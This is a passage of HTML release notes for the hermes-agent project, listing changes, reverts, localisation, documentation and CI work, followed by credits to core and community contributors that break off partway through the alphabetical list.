<li><strong>Profiles+banner: exclude infrastructure from <code>--clone-all</code> + fix stale update-check repo resolution</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22475" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22475/hovercard">#22475</a>)</li>
<li><strong>ACP: inline file attachment resources</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400211653" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21400" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21400/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21400">#21400</a> + image support) (<a href="https://github.com/NousResearch/hermes-agent/pull/21407" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21407/hovercard">#21407</a>)</li>
<li><strong>CI: unblock shared PR checks</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stephenschoettler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stephenschoettler">@stephenschoettler</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21012" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21012/hovercard">#21012</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/25957" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25957/hovercard">#25957</a>)</li>
</ul>
<h3>Notable reverts in window</h3>
<ul>
<li><strong><code>/goal</code> checklist + /subgoal feature stack</strong> — rolled back (<a href="https://github.com/NousResearch/hermes-agent/pull/23813" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23813/hovercard">#23813</a>); <code>/subgoal</code> returned in simpler form via <a href="https://github.com/NousResearch/hermes-agent/pull/25449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25449/hovercard">#25449</a></li>
<li><strong>Scrollback box width clamp</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4449744090" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25975" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25975/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25975">#25975</a>) rolled back to restore full-width borders (<a href="https://github.com/NousResearch/hermes-agent/pull/26163" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26163/hovercard">#26163</a>)</li>
<li><strong><code>fix(cli): tolerate unreadable dirs when building systemd PATH</code></strong> rolled back</li>
</ul>
<hr>
<h2>🌍 i18n</h2>
<ul>
<li><strong>Localize all gateway commands + web dashboard, add 8 new locales (16 total)</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22914" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22914/hovercard">#22914</a>)</li>
</ul>
<hr>
<h2>📚 Documentation</h2>
<ul>
<li><strong>Repair Voice &amp; TTS provider table</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nightcityblade/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nightcityblade">@nightcityblade</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4425548878" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/24101" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/24101/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/24101">#24101</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/24138" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24138/hovercard">#24138</a>)</li>
<li><strong>Show per-skill pages in the left sidebar</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26646" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26646/hovercard">#26646</a>)</li>
<li><strong>Mention Weixin in gateway help and docstrings</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4396673114" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21063" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21063/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21063">#21063</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wuwuzhijing/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wuwuzhijing">@wuwuzhijing</a>)</li>
<li><strong>Richer info panels on the Skills Hub</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22905" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22905/hovercard">#22905</a>)</li>
<li>Many more doc updates across providers, platforms, skills, Windows install paths, and dashboard.</li>
</ul>
<hr>
<h2>🧪 Testing &amp; CI</h2>
<ul>
<li><strong>Unblock shared PR checks</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stephenschoettler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stephenschoettler">@stephenschoettler</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21012" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21012/hovercard">#21012</a>)</li>
<li><strong>Stabilize shared test state after 21012</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stephenschoettler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stephenschoettler">@stephenschoettler</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/25957" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25957/hovercard">#25957</a>)</li>
<li>A long tail of test additions for platforms, providers, plugins, and edge cases — 8 explicit <code>test:</code> PRs plus ~250 fix PRs that also added regression coverage.</li>
</ul>
<hr>
<h2>👥 Contributors</h2>
<h3>Core</h3>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a> — release lead, architecture, ~406 PRs merged in window</li>
</ul>
<h3>Top community contributors</h3>
<ul>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a></strong> — 38 PRs · Telegram cadence/streaming/topic routing, security hardening (sudo, SSRF, kanban_comment, dashboard auth), codex-runtime hygiene, NovitaAI provider, profile/banner fixes, Feishu update cards, gateway QOL across the board</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a></strong> — 13 PRs · Markdown-table TUI rendering, <code>HERMES_SESSION_ID</code> env var, hindsight-client optional dep, Nix <code>extraDependencyGroups</code></li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a></strong> (Brooklyn Nicholson) — 12 PRs · TUI turn segmentation, attach-to-gateway, markdown link titles, embedded TUI via dashboard gateway, Ink cursor sync, scroll/Esc during prompts</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a></strong> — 8 PRs · <code>/sessions</code> slash command, personality switching preserves session, cron modals, dashboard analytics</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a></strong> — 5 PRs · Google Chat setup, browser install skip on system chromium, Windows Ctrl+C preservation</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a></strong> — 4 PRs · Nous Portal as model metadata authority, provider polish</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stephenschoettler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stephenschoettler">@stephenschoettler</a></strong> — 3 PRs · CI stabilization</li>
<li><strong><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a></strong> — 3 PRs · platform/gateway work</li>
</ul>
<h3>All contributors (alphabetical)</h3>
<p><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/02356abc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/02356abc">@02356abc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xbyt4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xbyt4">@0xbyt4</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xharryriddle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xharryriddle">@0xharryriddle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1000Delta/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1000Delta">@1000Delta</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1RB/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1RB">@1RB</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/29206394/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/29206394">@29206394</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/A-kamal/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/A-kamal">@A-kamal</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aashizpoudel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aashizpoudel">@aashizpoudel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Abd0r/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Abd0r">@Abd0r</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/adybag14-cyber/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/adybag14-cyber">@adybag14-cyber</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AgentArcLab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AgentArcLab">@AgentArcLab</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ahmedbadr3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ahmedbadr3">@ahmedbadr3</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AhmetArif0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AhmetArif0">@AhmetArif0</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alblez/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alblez">@alblez</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Alex-yang00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Alex-yang00">@Alex-yang00</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ALIYILD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ALIYILD">@ALIYILD</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AllynSheep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AllynSheep">@AllynSheep</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/am423/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/am423">@am423</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amathxbt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amathxbt">@amathxbt</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amethystani/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amethystani">@amethystani</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ArecaNon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ArecaNon">@ArecaNon</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Arkmusn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Arkmusn">@Arkmusn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/askclaw-vesper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/askclaw-vesper">@askclaw-vesper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AsoTora/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AsoTora">@AsoTora</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aydnOktay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aydnOktay">@aydnOktay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ayushere/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ayushere">@ayushere</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/baocin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/baocin">@baocin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bartok9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bartok9">@Bartok9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BennetYrWang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BennetYrWang">@BennetYrWang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Bihruze/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Bihruze">@Bihruze</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/binhnt92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/binhnt92">@binhnt92</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/briandevans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/briandevans">@briandevans</a>,<br>
@brooklynnicholson, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/btorresgil/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/btorresgil">@btorresgil</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/buntingszn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/buntingszn">@buntingszn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CalmProton/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CalmProton">@CalmProton</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chrisworksai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chrisworksai">@chrisworksai</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CoinTheHat/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CoinTheHat">@CoinTheHat</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dandacompany/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dandacompany">@dandacompany</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dangooy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dangooy">@Dangooy</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DanielLSM/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DanielLSM">@DanielLSM</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/David-0x221Eight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/David-0x221Eight">@David-0x221Eight</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ddupont808/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ddupont808">@ddupont808</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dhruv-saxena/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dhruv-saxena">@dhruv-saxena</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/diablozzc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/diablozzc">@diablozzc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dlkakbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dlkakbs">@dlkakbs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dmahan93/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dmahan93">@dmahan93</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dmnkhorvath/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dmnkhorvath">@dmnkhorvath</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/domtriola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/domtriola">@domtriola</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donrhmexe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donrhmexe">@donrhmexe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Dusk1e/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Dusk1e">@Dusk1e</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eloklam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eloklam">@eloklam</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/emozilla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/emozilla">@emozilla</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ephron-ren/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ephron-ren">@ephron-ren</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ErenKarakus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ErenKarakus">@ErenKarakus</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/EthanGuo-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/EthanGuo-coder">@EthanGuo-coder</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evgyur/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evgyur">@evgyur</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/explainanalyze/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/explainanalyze">@explainanalyze</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fahdad/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fahdad">@fahdad</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fr33d3m0n/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fr33d3m0n">@fr33d3m0n</a>, <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/Freeman-Consulting/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Freeman-Consulting">@Freeman-Consulting</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/freqyfreqy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/freqyfreqy">@freqyfreqy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Frowtek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Frowtek">@Frowtek</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fu576/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fu576">@fu576</a>, @github-actions[bot], <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gnanirahulnutakki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gnanirahulnutakki">@gnanirahulnutakki</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/guglielmofonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/guglielmofonda">@guglielmofonda</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Gutslabs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Gutslabs">@Gutslabs</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hanzckernel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hanzckernel">@hanzckernel</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heathley/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heathley">@heathley</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hekaru-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hekaru-agent">@hekaru-agent</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HenkDz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HenkDz">@HenkDz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HiddenPuppy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HiddenPuppy">@HiddenPuppy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hllqkb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hllqkb">@hllqkb</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hrygo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hrygo">@hrygo</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HuangYuChuh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HuangYuChuh">@HuangYuChuh</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hugo-SEQUIER/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hugo-SEQUIER">@Hugo-SEQUIER</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HxT9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HxT9">@HxT9</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iacker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iacker">@iacker</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/InB4DevOps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/InB4DevOps">@InB4DevOps</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/isaachuangGMICLOUD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/isaachuangGMICLOUD">@isaachuangGMICLOUD</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iuyup/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iuyup">@iuyup</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jaaneek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jaaneek">@Jaaneek</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackey8616/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackey8616">@jackey8616</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackjin1997/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackjin1997">@jackjin1997</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jaggia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jaggia">@Jaggia</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jak983464779/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jak983464779">@jak983464779</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jelrod27/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jelrod27">@jelrod27</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jethac/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jethac">@jethac</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JithendraNara/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JithendraNara">@JithendraNara</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/johnisag/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/johnisag">@johnisag</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Julientalbot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Julientalbot">@Julientalbot</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jwd-gity/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jwd-gity">@Jwd-gity</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kallidean/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" 